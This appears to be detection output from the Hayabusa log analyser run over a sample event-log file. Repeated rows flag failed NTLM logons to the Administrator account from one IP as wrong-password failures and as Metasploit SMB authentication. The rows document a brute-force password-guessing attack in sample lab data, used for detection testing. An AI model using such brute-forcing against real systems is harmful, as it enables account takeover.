SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S9iVvPuykq62pV9z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eRVomETC34InuKPk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VpHfjKgAxChSYz8R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: tIbTy5IDRy90lbUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mM6Olq0zYkMlwmrb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mUehtGEh0EqRHiLP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhZ2KHmCTonGrXSS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NZea5qiet7vrT3iv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aNWY8kuJMSy8h0Zk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bt9DUQ0mwhkJlTt8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zXYtsM2MMuNSYtVr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WgzvsdMN2SU7Knlh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DxiBYXNCY32yNb6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: cVfJmOxvsp75g3a0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uHp1hlHjD8w3WKt3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dEeJWAJgOeueYSM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tOfPGoUXu932L80d : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NbH4R6GK1PIVT3ij : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PgsJokRd07Nh1lO1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 11ylyxQyV5HCJ18g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Am2qI1ya4wYdqErV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o2AmZsYUYmDpWZE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c0Hd8xWxOxFifJBG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: hlh64Gtfoig2uzOY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LtK8Hj2kf3dfFSnW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VKUPqxtNqkVqXgTg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SKSxp87CBg8L8wSi : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CpvxvR0ftQs1gdEF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U9RGDzNMt9fM6rLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RvOO9NLhbbKJXQq9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mDB9bIx7LcoJ6IAU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfJWsGqlQTmFUUPT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9PRIO3MASsjrdQGs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: P9QCn4nZHB0ENeA1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4iUNHB1gE2d1dBfZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tM3IdtrLdVXQjOjB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dbmn9Er9e1JZZybc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SY40ARcAoo9cWQIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fc7m0blzidQfn1BU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 13SkGPbDDXou7qLA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2YIlJeZpJlvcKgqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BRhH6atcwLcGmrB4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BGIInLsy4UCfl0oW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 4qJ7nEN0u9DkVuVH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6qb85lEENmrj4ebF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6RXAj26rnxMmxuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tas7cqRNGQw6FlVX : IP Address: 192.168.198.149 : AuthPackage: 
